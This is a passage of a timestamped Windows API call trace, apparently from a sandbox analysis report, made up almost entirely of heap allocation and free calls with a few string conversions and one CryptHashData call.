hHeap=0x970000) returned 1 [0234.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0234.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0234.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0234.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0234.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0234.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0234.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0234.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0234.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0234.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0234.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0234.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0234.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0234.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0234.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0234.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0234.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0234.450] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0234.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0234.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0234.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0234.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0234.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0234.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0234.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0234.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0234.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0234.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0234.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0234.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0234.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0234.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f28 [0234.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0234.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0234.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0234.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0234.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0234.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0234.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0234.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0234.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0234.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0234.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0234.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0234.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0234.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0234.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0234.452] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0234.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0234.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0234.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0234.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0234.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0234.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0234.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0234.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0234.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0234.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0234.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55018 [0234.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0234.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0234.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0234.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0234.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55028, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0234.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0234.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0234.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550d8 [0234.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0234.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0234.454] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0234.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0234.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0234.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0234.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0234.454] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.454] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0234.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0234.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.454] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0234.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0234.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0234.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0234.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0234.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51370 [0234.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51370, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0234.455] CryptHashData (hHash=0xa87590, pbData=0x2e54f28, dwDataLen=0x3, dwFlags=0x1) returned 1 [0234.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0234.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0234.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0234.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0234.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0234.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0234.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0234.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0234.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0234.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0234.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0234.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0234.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0234.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0234.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0234.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0234.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0234.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0234.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0234.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0234.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0234.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0234.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0234.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0234.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0234.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0234.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0234.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0234.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0234.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0234.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0234.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0234.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0234.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0234.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0234.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0234.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0234.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0234.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0234.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0234.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0234.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0234.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0234.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0234.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0234.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0234.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0234.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0234.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0234.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0234.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0234.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0234.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0234.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0234.458] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0234.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0234.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0234.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04118 [0234.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0234.458] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0234.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0234.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0234.458] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0234.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0234.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0234.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0234.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0234.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0234.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0234.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0234.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0234.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0234.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0234.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0234.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0234.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0234.459] RtlAllocateHeap 